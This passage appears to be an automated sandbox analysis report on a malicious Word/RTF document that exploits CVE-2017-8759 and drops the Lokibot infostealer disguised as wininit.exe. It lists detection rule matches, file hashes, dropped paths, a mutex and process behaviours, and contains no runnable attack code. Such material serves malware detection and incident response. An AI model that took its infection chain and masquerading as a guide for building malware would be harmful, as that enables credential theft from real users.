                Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: wininit.exe PID: 3868, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: wininit.exe PID: 3932, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 13_2_001C04C013_2_001C04C0
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 13_2_001C280813_2_001C2808
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 13_2_001C104713_2_001C1047
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 13_2_001C108F13_2_001C108F
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 13_2_001CC41013_2_001CC410
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 13_2_001CD6D813_2_001CD6D8
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 13_2_001CC84813_2_001CC848
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 13_2_001CCC8013_2_001CCC80
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 13_2_001CBFD813_2_001CBFD8
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_0040549C15_2_0040549C
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_004029D415_2_004029D4
                Source: ~WRF{8F9E19BA-7C14-4A61-89D3-CF9016D92B91}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe 59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy) 59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\wininit.exe 59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
                Source: stthigns.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 13.2.wininit.exe.3a0edc0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 13.2.wininit.exe.3a0edc0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 13.2.wininit.exe.3a0edc0.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 13.2.wininit.exe.3a0edc0.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 13.2.wininit.exe.3a28de0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 13.2.wininit.exe.3a28de0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 13.2.wininit.exe.3a28de0.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 13.2.wininit.exe.3a28de0.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: wininit.exe PID: 3868, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: wininit.exe PID: 3932, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
                Source: caspol[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wininit.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, BE5k0LFu5KnoWIB8ne.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, BE5k0LFu5KnoWIB8ne.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.SetAccessControl
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.AddAccessRule
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.SetAccessControl
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@18/31@0/2
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,15_2_0040650A
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,15_2_0040434D
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$thigns.docJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\wininit.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7B95.tmpJump to behavior
                Source: ~WRF{8F9E19BA-7C14-4A61-89D3-CF9016D92B91}.tmp.0.drOLE document summary: title field not present or empty
                Source: ~WRF{8F9E19BA-7C14-4A61-89D3-CF9016D92B91}.tmp.0.drOLE document summary: author field not present or empty
                Source: ~WRF{8F9E19BA-7C14-4A61-89D3-CF9016D92B91}.tmp.0.drOLE document summary: edited time not present or 0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................0.......(.P..............................:.........................s............(..................s............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............(...............(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................!%.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%...................... .a.g.a.........................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........%...................... .a.g.a................. .......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&...................... .a.g.a.........................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.e.V.i.C.E.c.r.E.D.E.n.t.i.A.L.d.E.p.l.O.Y.m.e.N.t......... .a.g.a.................8.......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................|&...................... .a.g.a.........................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......... .a.g.a.................8.......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&...................... .a.g.a.........................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&...................... .a.g.a.........................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&...................... .a.g.a.........................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.a.................F.......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&......................i.o.n.a.........................(...............Jump to behavior
